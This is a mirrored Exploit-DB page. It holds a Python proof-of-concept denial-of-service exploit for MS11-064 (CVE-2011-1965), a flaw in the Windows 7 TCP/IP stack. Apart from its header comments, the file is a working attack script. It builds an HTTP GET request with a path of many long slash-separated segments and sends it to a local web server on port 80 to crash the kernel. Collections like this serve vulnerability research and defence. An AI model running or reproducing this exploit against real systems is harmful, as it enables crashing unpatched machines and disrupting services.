bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/17981.py
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

42 lines
No EOL
1.2 KiB
Python
Executable file
Raw Blame History

# Exploit Title: MS11-064 : Vulnerabilities in TCP/IP Stack Could
Allow Denial of Service
# Date: 10/12/2011
# Author: Byoungyoung Lee, http://www.cc.gatech.edu/~blee303/
# Version: Windows 7 32bit, fully patched until Aug 2011
# Tested on: Windows 7 32bit
# CVE : CVE-2011-1965
# analysis is available -
http://exploitshop.wordpress.com/2011/09/07/ms11-064-vulnerabilities-in-tcpip-stack-could-allow-denial-of-service-2563894/
------------------------------------------------------------------------------------------------------
# Byoungyoung Lee, http://twitter.com/mylifeasageek
import struct
import socket
HOST = "localhost" # yeah, we've tried this as a local kernel exploit -:)
PORT= 80
def tryOnce(i,j):
print hex(i), hex(j)
filename = ["a"*0x100 for x in range(i)]
filename = "/".join(filename)
filename += "/" + "b" * j
print "filename len : ", hex(len(filename))
hostname = "www.darungrim.org"
header = "GET /%s\n" % filename
header += "HOST: %s\n\n\n" % hostname
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST,PORT))
s.send(header)
response = s.recv(1024)
s.close()
print response
return
if __name__ == '__main__':
tryOnce(0x3c,0x7)
Reference in a new issue View git blame Copy permalink